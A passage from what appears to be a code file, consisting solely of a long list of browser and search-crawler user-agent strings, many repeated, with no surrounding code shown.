rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) 